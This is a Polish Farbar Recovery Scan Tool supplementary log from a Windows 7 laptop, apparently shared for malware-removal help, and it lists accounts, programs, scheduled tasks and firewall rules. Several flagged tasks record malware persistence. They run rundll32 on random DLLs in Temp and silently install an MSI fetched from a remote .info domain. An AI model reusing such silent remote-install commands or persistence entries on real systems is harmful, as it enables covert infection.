Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x86) Wersja: 18-02-2019
Uruchomiony przez Soska (20-02-2019 11:14:44)
Uruchomiony z C:\Users\Soska\Downloads
Microsoft Windows 7 Home Premium  Service Pack 1 (X86) (2016-10-23 19:53:31)
Tryb startu: Normal
==========================================================


==================== Konta użytkowników: =============================

Administrator (S-1-5-21-1196631564-2932191510-2940953793-500 - Administrator - Disabled)
Gość (S-1-5-21-1196631564-2932191510-2940953793-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1196631564-2932191510-2940953793-1002 - Limited - Enabled)
Soska (S-1-5-21-1196631564-2932191510-2940953793-1000 - Administrator - Enabled) => C:\Users\Soska

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

Adobe Acrobat Reader DC - Polish (HKLM\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 19.010.20091 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
ATI Catalyst Install Manager (HKLM\...\{D001278B-867A-5FD6-BF2E-DA170DB1E9FC}) (Version: 3.0.741.0 - ATI Technologies, Inc.)
Bing Bar (HKLM\...\{3611CA6C-5FCA-4900-A329-6A118123CCFC}) (Version: 7.1.355.0 - Microsoft Corporation)
Blobby Volley 2 Version 1.0 (HKLM\...\Blobby Volley 2 Version 1.0_is1) (Version:  - )
ccc-core-static (HKLM\...\{3F07DEBB-DDFA-71A5-4833-FD7B4570099A}) (Version: 2009.0813.2131.36817 - Nazwa firmy) Hidden
Dolby Control Center (HKLM\...\{87725CEF-1BC6-47C5-B2CD-96DD6D392EE3}) (Version: 2.2.1 - Dolby)
Energy Management (HKLM\...\{AE1E24C2-E720-42D5-B8E1-48F71A97B4DB}) (Version: 4.3.1.4 - Lenovo)
HP Deskjet 2050 J510 series — badanie mające na celu poprawę produktów (HKLM\...\{25F1DB60-93BB-4593-AF67-13CFC7B28AF1}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2050 J510 series — podstawowe oprogramowanie urządzenia (HKLM\...\{7DE87E06-A839-4E7E-A447-348139755946}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2050 J510 series Pomoc (HKLM\...\{7A3DF2E2-CF13-44FB-A93E-F71D5381DB3F}) (Version: 140.0.61.61 - Hewlett Packard)
HP Photo Creations (HKLM\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
IC_Katalog ONLINE (HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\...\2f3530a7666b3c93) (Version: 2.71.0.0 - Inter Cars)
Java 7 Update 51 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle)
Manager (HKLM\...\{8DED36D9-54D6-4127-A112-5A1BA1CDD66B}) (Version: 5.0.26.33533 - 2017 pdfforge GmbH. All rights reserved) Hidden
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Mozilla Firefox 65.0.1 (x86 en-US) (HKLM\...\Mozilla Firefox 65.0.1 (x86 en-US)) (Version: 65.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 65.0.1 - Mozilla)
Nero 7 Essentials (HKLM\...\{81CD6232-10F5-4832-B3DA-1B88B1571045}) (Version: 7.02.5851 - Nero AG)
PCMSCAN (HKLM\...\{979B748C-6095-4A5A-BC7B-C15E720529D6}) (Version: 2.4.12 - Palmer Performance Engineering)
Picasa 3 (HKLM\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
PL-2303 USB-to-Serial (HKLM\...\{ECC3713C-08A4-40E3-95F1-7D0704F1CE5E}) (Version: 1.2.10 - Prolific Technology INC)
Polski pakiet językowy dla programu Microsoft .NET Framework 4.5 PLK (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1045) (Version: 4.5.50709 - Microsoft Corporation)
Polski VAG 2.5 (HKLM\...\Polski VAG 2.5_is1) (Version: 2.502 - www.obd2.pl)
PX Profile Update (HKLM\...\{E4C850CE-C78B-4E21-57C5-C297829ADD9B}) (Version: 1.00.1. - AMD) Hidden
Realtek 8136 8168 8169 Ethernet Driver (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0005 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5911 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30095 - Realtek Semiconductor Corp.)
ScanTool.net for Windows v1.13 (HKLM\...\ScanTool.net for Windows) (Version: v1.13 - ScanTool.net, LLC)
Testy kategorie C, D, T 4.1.4 (HKLM\...\Testy kategoria CDT LKCDT-342_is1) (Version:  - Liwona sp. z o.o.)
WinRAR 5.40 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL -> Brak pliku
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\atiacmxx.dll [2009-08-13] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {147AF673-AF77-48BC-9B40-99721F0DD954} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe (AVAST Software s.r.o. -> AVAST Software)
Task: {3D83E7A3-901D-4274-9E92-251C2ABF632F} - System32\Tasks\snf => C:\ProgramData\Polygen\Polygen.exe <==== UWAGA
Task: {52D2D139-D072-4B44-98B0-08038738C44F} - System32\Tasks\QYuopVyvriCPHaS => rundll32 "C:\Users\Soska\AppData\Local\Temp\nNxWrSPqpNrwsoEyy\CYXMGbcuXGPPliuU\gAsyVFa.dll",#1 /adp WIRF3EJRF4GKRF5WJRF4DKRF1ZIRF0KKRF7FKRF3BKRF2UJRF6EIRF1XIRF9PIRF6MJRF1UIRF5 /site_id 721.160122592_131566 <==== UWAGA
Task: {5C7F14DE-47AC-4A48-98AB-AFCA0D43B8D8} - System32\Tasks\Update => C:\Users\Soska\AppData\Roaming\Microsoft\taskhostw.exe <==== UWAGA
Task: {6BE002B9-5EE9-4F1C-AC3E-A0546467C9EA} - System32\Tasks\HP Deskjet 2050 J510 series.exe_{60C41FA8-B056-47B8-904A-FDAA9AC6C755} => C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\HP Deskjet 2050 J510 series.exe (Hewlett Packard -> Hewlett-Packard Co.)
Task: {95F14659-9631-45E4-BA0A-B18BDF73B2B6} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {9FAA5757-D279-4811-AD2C-69E5861B3414} - System32\Tasks\{D7AF84F9-55A4-449B-4E1E-473FFEAA2DF3} => C:\Program Files\Common Files\deuNeyt.exe
Task: {C403196C-5784-49C7-903C-DA80E8567BF4} - System32\Tasks\{C9747E93-B4A0-5296-15F9-4A926916721D} => "msiexec.exe" /i hxxps://refreshnerer711rb.info/Fv587VcC3.57X /q <==== UWAGA
Task: {E207F58D-FAF2-44A1-8629-023648108556} - System32\Tasks\daZUxYAWxkQuTWt => rundll32 "C:\Users\Soska\AppData\Local\Temp\nNxWrSPqpNrwsoEyy\nGeBvHGpNdcwfUFg\XhhEltS.dll",#1 /adp RJRF0MJRF0DJRF1AJRF4LKRF8EJRF3GIRF0YIRF5LKRF2SJRF7WIRF7GKRF5BJRF0YIRF8HKRF3 /site_id 754 <==== UWAGA
Task: {F17A1BCA-23D7-48C1-8410-4840B332743C} - System32\Tasks\snp => C:\ProgramData\Polygen\Polygen.exe <==== UWAGA
Task: {F7EFEC64-2C3D-49FB-AFC8-7D5B6360D1D1} - System32\Tasks\HPCustParticipation HP Deskjet 2050 J510 series => C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\HPCustPartic.exe (Hewlett Packard -> Hewlett-Packard Co.)
Task: {FB46AAC0-AAD1-49FF-9C9E-1D24604576F3} - System32\Tasks\Opera scheduled Autoupdate 2796787680 => C:\Users\Soska\AppData\Roaming\Microsoft\Windows\virstcec\ftdwvibr.exe () [Brak podpisu cyfrowego]

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)


==================== Skróty & WMI ========================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]

Shortcut: C:\Users\Public\Desktop\Testy kategorie C, D, T.lnk -> C:\Program Files\Testy kategorie C, D, T\Start.bat ()

ShortcutWithArgument: C:\Users\Soska\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Soska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Soska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%

==================== Załadowane moduły (filtrowane) ==============

2016-11-02 16:40 - 2008-12-20 03:20 - 000063304 _____ () C:\Program Files\Lenovo\Energy Management\kbdhook.dll
2016-11-02 16:40 - 2008-12-20 03:20 - 000051016 _____ () C:\Program Files\Lenovo\Energy Management\HookLib.dll
2008-05-21 10:59 - 2008-05-21 10:59 - 000016384 ____R () C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2016-11-02 16:43 - 2016-11-02 16:43 - 000270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)

AlternateDataStreams: C:\Windows\system32\config\systemprofile:.repos [6040196]

==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)


==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)


==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)

IE trusted site: HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2009-07-14 03:04 - 2019-02-20 11:01 - 000000035 _____ C:\Windows\system32\drivers\etc\hosts


==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Soska\AppData\Roaming\Mozilla\Firefox\Tapeta pulpitu.bmp
DNS Servers: 192.168.8.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==

Załączenie wejścia w fixlist spowoduje jego usunięcie.


==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [{C2F545D3-D65C-4C4A-B81D-2DC41C679238}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{37704D7A-6F6B-4A0F-8E0F-BB9AA9AFA0C8}] => (Allow) C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\USBSetup.exe (Hewlett Packard -> Hewlett-Packard Co.)
FirewallRules: [{E080C520-7E2D-42C5-99AF-71B434AA34D2}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0917\HPDiagnosticCoreUI.exe Brak pliku
FirewallRules: [{4BC68413-84F4-4757-B7E9-0D4F3607EDC6}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0917\HPDiagnosticCoreUI.exe Brak pliku
FirewallRules: [{D2F4292A-4A7B-43F7-9380-387C12406DE7}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0C99\HPDiagnosticCoreUI.exe Brak pliku
FirewallRules: [{AD6A5CF5-F681-45E7-974E-A43247FA57E7}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0C99\HPDiagnosticCoreUI.exe Brak pliku
FirewallRules: [{9797F2BA-37A1-4470-9C0B-FB412D8ADE3F}] => (Allow) C:\Windows\system32\InstallShield\x32\setup.exe (Ghisler Software GmbH -> )
FirewallRules: [{62959B8A-8529-4D4F-95D5-9AB84ABCAD3C}] => (Allow) C:\Windows\system32\InstallShield\x32\setup.exe (Ghisler Software GmbH -> )
FirewallRules: [{DFCFE604-3572-422A-B708-13C6EF165E53}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{0BDBFE70-831D-430A-B7A1-441A0345A66B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{062C455B-6652-4E58-89FF-412AC57C1703}] => (Allow) C:\Windows\system32\InstallShield\x32\setup.exe (Ghisler Software GmbH -> )
FirewallRules: [{8B5BFCE5-2E3E-4D7F-981F-B8EC139A80A9}] => (Allow) C:\Windows\system32\InstallShield\x32\setup.exe (Ghisler Software GmbH -> )
FirewallRules: [{21EDC8BF-8A3A-4D91-9A26-7AB54C7545EF}] => (Allow) C:\Windows\system32\InstallShield\x32\setup.exe (Ghisler Software GmbH -> )

==================== Punkty Przywracania systemu =========================

10-02-2019 15:22:07 Windows Update
10-02-2019 17:47:40 Installed Java 7 Update 51
19-02-2019 16:58:57 Installed PCMSCAN
19-02-2019 17:05:33 Installed Silicon Laboratories CP210x VCP Drivers for Windows XP¸ŚćižćižEGuťchž
19-02-2019 17:07:25 Installed Silicon Laboratories CP210x VCP Drivers for Windows 20ÝňĆ[hž¸pž

19-02-2019 17:27:08 Installed Silicon Laboratories CP210x VCP Drivers for Windows XP¸Śćižćižż´¬ěÖhŻ
19-02-2019 17:28:45 Configured Silicon Laboratories CP210x VCP Drivers for Windows X5Âfá}áëá@Ţ~ć“
19-02-2019 17:30:23 Removed Silicon Laboratories CP210x VCP Drivers for Windows XP/2_¬ÚĂ^ÄÚt±Ć-
19-02-2019 17:31:01 Removed Silicon Laboratories CP210x VCP Drivers for Windows 20005Âfá}áëáT}Y*ő,
19-02-2019 17:58:00 Installed PL-2303 USB-to-Serial
19-02-2019 18:19:42 Removed WhiteClick
19-02-2019 18:46:04 Removed Silicon Laboratories CP210x VCP Drivers for Windows XP/2(ĚÖ@ţ‹

==================== Wadliwe urządzenia w Menedżerze urządzeń =============

Name: Generic Bluetooth Adapter
Description: Generic Bluetooth Adapter
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: GenericAdapter
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (02/20/2019 11:05:18 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


Dziennik System:
=============
Error: (02/20/2019 11:02:42 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: Serwer {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} nie zarejestrował się w modelu DCOM w wymaganym czasie.


==================== Statystyki pamięci =========================== 

Procesor: Genuine Intel(R) CPU U4100 @ 1.30GHz
Procent pamięci w użyciu: 56%
Całkowita pamięć fizyczna: 3066.54 MB
Dostępna pamięć fizyczna: 1340.14 MB
Całkowita pamięć wirtualna: 6131.36 MB
Dostępna pamięć wirtualna: 4290.26 MB

==================== Dyski ================================

Drive c: () (Fixed) (Total:97.56 GB) (Free:41.87 GB) NTFS ==>[dysk z komponentami startowymi (pozyskano odczytując BCD)]
Drive d: () (Fixed) (Total:135.23 GB) (Free:118.92 GB) NTFS


==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 6067ECBA)
Partition 1: (Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=135.2 GB) - (Type=07 NTFS)

==================== Koniec  Addition.txt ============================